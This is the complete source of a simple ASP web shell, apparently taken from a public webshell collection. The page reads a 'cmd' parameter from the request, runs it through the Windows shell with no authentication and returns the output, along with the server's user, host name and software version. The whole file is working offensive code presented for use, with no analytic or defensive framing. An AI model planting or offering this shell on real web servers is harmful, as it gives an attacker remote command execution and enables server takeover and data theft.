simple_shell.asp

<!--
Simple ASP Webshell
Based on: https://raw.githubusercontent.com/tennc/webshell/master/asp/webshell.asp
-->


<%
Set oScript = Server.CreateObject("WSCRIPT.SHELL")
Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK")
Set oFileSys = Server.CreateObject("Scripting.FileSystemObject")
Function getCommandOutput(theCommand)
    Dim objShell, objCmdExec
    Set objShell = CreateObject("WScript.Shell")
    Set objCmdExec = objshell.exec(thecommand)
    getCommandOutput = objCmdExec.StdOut.ReadAll
end Function

Set serverVers = Request.ServerVariables("server_software")
Set serverName = Request.ServerVariables("server_name")
Set serverPort = Request.ServerVariables("server_port")
Set serverIp = Request.ServerVariables("LOCAL_ADDR")
Set szCMD = request("cmd")
%>


<html>
<body>

Logged in as <b><%= oScriptNet.UserName %></b><br />
<br />
<b>The server's software...</b> <%= serverVers %><br />
<b>This server...</b> <%= serverName & ":" & serverPort & " <b>[</b>" & oScriptNet.ComputerName & "<b>]</b>" %>

<hr />

<form action="" method="GET">
<input type="text" name="cmd" size=45 value="<%= szCMD %>">
<input type="submit" value="Run">
</form>

<pre>
<%
thisDir = getCommandOutput("cmd /c" & szCMD)
Response.Write(Replace(thisDir, "<DIR>", "&#x3C;DIR&#x3E;"))
%>
</pre>

</body>
</html>

see also: https://gist.github.com/gazcbm/ea7206fbbad83f62080e0bbbeda77d9c